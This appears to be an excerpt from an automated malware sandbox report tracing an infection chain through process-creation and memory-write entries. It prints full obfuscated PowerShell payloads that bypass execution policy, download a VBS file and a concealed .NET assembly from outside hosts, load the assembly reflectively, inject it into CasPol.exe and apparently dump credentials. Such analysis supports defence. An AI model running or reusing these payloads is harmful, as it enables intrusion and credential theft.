                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe32_2_00410F36
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00418754 mouse_event,32_2_00418754
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBA2.tmp" "c:\Users\user\AppData\Local\Temp\sietgs52\CSC6D12096A8D2545939E28F0D748EE93EA.TMP"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamenteJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF4EA.tmp" "c:\Users\user\AppData\Local\Temp\tc3erle0\CSCE42B52D3958749FFBAC69A71E4122F1.TMP"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\tozq"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\wieivps"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\gcjtvhddyq"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jg0yicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzgqtdhlqzsagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrlrmloavrjt24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24urgxsiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiedqae1ttxzxr0thlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagbghtsyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagienrqkflwlqsdwludcagicagicagicagicagicagicagicagicagicagicagsunfy1jkzulvecxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihb6ehh6cg1jktsnicagicagicagicagicagicagicagicagicagicagicatbkfnzsagicagicagicagicagicagicagicagicagicagicagilp4ek5lww9hsndqiiagicagicagicagicagicagicagicagicagicagicaglu5btwvtcefdrsagicagicagicagicagicagicagicagicagicagicags3f6r2puicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakbti6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xndiuotmunjuumtyxlzy4mc93zw5lzwrraxnzaw5nd2vsbg9uz2lybgzyawvuzhnozwjlyxv0awz1bgdpcmwudelgiiwijgvovjpbufbeqvrbxhdlbmvlzgtpc3npbmd3zwxsb25naxjsznjpzw5kc2hlymvhdxrpzi52ylmildasmck7u3rbunqtu0xfrxaomyk7awkgicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcd2vuzwvka2lzc2luz3dlbgxvbmdpcmxmcmllbmrzagvizwf1dglmlnziuyi='+[char]34+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jg0yicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzgqtdhlqzsagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrlrmloavrjt24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24urgxsiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiedqae1ttxzxr0thlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagbghtsyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagienrqkflwlqsdwludcagicagicagicagicagicagicagicagicagicagicagsunfy1jkzulvecxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihb6ehh6cg1jktsnicagicagicagicagicagicagicagicagicagicagicatbkfnzsagicagicagicagicagicagicagicagicagicagicagilp4ek5lww9hsndqiiagicagicagicagicagicagicagicagicagicagicaglu5btwvtcefdrsagicagicagicagicagicagicagicagicagicagicags3f6r2puicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakbti6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xndiuotmunjuumtyxlzy4mc93zw5lzwrraxnzaw5nd2vsbg9uz2lybgzyawvuzhnozwjlyxv0awz1bgdpcmwudelgiiwijgvovjpbufbeqvrbxhdlbmvlzgtpc3npbmd3zwxsb25naxjsznjpzw5kc2hlymvhdxrpzi52ylmildasmck7u3rbunqtu0xfrxaomyk7awkgicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcd2vuzwvka2lzc2luz3dlbgxvbmdpcmxmcmllbmrzagvizwf1dglmlnziuyi='+[char]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $biscato = 'jhnvcnjlbmfyid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgrlc2vyzgfyid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskzgvzyxzlc3nvid0gjgrlc2vyzgfylkrvd25sb2fkrgf0ysgkc29ycmvuyxipoyr0b21izwlybya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrkzxnhdmvzc28poyrjcmv0aw5pemfyid0gjzw8qkftrty0x1nuqvjupj4noyrnbgfuzhvsawzvcm1lid0gjzw8qkftrty0x0vord4+jzskz3jvc2egpsakdg9tymvpcm8usw5kzxhpzigky3jldgluaxphcik7jhryawdsb3r0axntbya9icr0b21izwlyby5jbmrlee9mkcrnbgfuzhvsawzvcm1lktskz3jvc2eglwdlidaglwfuzcakdhjpz2xvdhrpc21vic1ndcakz3jvc2e7jgdyb3nhics9icrjcmv0aw5pemfylkxlbmd0adskzgvzywjhzmfyid0gjhryawdsb3r0axntbyaticrncm9zytskc29mznjpdmvsbwvudgugpsakdg9tymvpcm8uu3vic3ryaw5nkcrncm9zyswgjgrlc2fiywzhcik7jgnvbnryywnhbwjpyxigpsatam9pbiaojhnvzmzyaxzlbg1lbnrlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrzb2zmcml2zwxtzw50zs5mzw5ndggpxtsky2f0yxjhy3rhid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygky29udhjhy2ftymlhcik7jgjhbwj1bgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrjyxrhcmfjdgepoyr0cmluy29szwpvid0gw2rubglilklplkhvbwvd